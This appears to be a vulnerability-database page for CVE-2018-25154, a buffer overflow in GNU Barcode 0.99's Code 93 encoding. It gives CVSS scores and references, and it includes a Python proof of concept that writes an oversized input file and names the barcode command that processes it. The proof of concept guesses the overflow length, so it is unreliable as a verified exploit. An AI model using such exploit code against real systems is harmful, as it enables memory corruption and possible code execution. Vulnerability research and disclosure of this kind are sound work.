CVE-2018-25154

Description

GNU Barcode 0.99 contains a buffer overflow vulnerability in its code 93 encoding process that allows attackers to trigger memory corruption. Attackers can exploit boundary errors during input file processing to potentially execute arbitrary code on the affected system.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

GNU Barcode 0.99

GNU Barcode <= 0.99

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2018-25154 PoC - GNU Barcode 0.99 Code 93 Buffer Overflow
# This PoC generates a malicious input file that triggers buffer overflow

import sys

def generate_malicious_input():
    """
    Generate malicious input for GNU Barcode to trigger code 93 buffer overflow
    """
    # Code 93 encoding uses specific character set
    # Extended Code 93 can encode full ASCII (0-127)
    
    # Create an oversized input that will overflow the buffer
    # The exact overflow length depends on the specific buffer size in the code
    target_length = 5000  # This should exceed the internal buffer size
    
    # Code 93 valid characters: 0-9, A-Z, -., $, /, +, %, space
    valid_chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-. $/+%'
    
    # Generate payload
    payload = ''
    for i in range(target_length):
        payload += valid_chars[i % len(valid_chars)]
    
    return payload

def create_barcode_file(filename, content):
    """Write content to file for processing by GNU Barcode"""
    with open(filename, 'w') as f:
        f.write(content)
    print(f"[*] Malicious input file created: {filename}")
    print(f"[*] File size: {len(content)} bytes")

def main():
    print("[*] CVE-2018-25154 GNU Barcode Code 93 Buffer Overflow PoC")
    print("[*] Target: GNU Barcode <= 0.99")
    
    # Generate malicious input
    payload = generate_malicious_input()
    
    # Save to file
    output_file = "malicious_input.txt"
    create_barcode_file(output_file, payload)
    
    print("[*] To trigger the vulnerability, process this file with GNU Barcode:")
    print(f"[*]   barcode -b {output_file} -o output.ps")
    print("[*] PoC generated successfully")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25154
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25154
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25154/
[4] VulDB https://vuldb.com/cve/CVE-2018-25154
[5] https://directory.fsf.org/wiki/Barcode
[6] https://www.exploit-db.com/exploits/44797
[7] https://www.gnu.org/software/barcode/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25154", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:50.280", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "GNU Barcode 0.99 contains a buffer overflow vulnerability in its code 93 encoding process that allows attackers to trigger memory corruption. Attackers can exploit boundary errors during input file processing to potentially execute arbitrary code on the affected system."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://directory.fsf.org/wiki/Barcode", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/44797", "source": "[email protected]"}, {"url": "https://www.gnu.org/software/barcode/", "source": "[email protected]"}]}}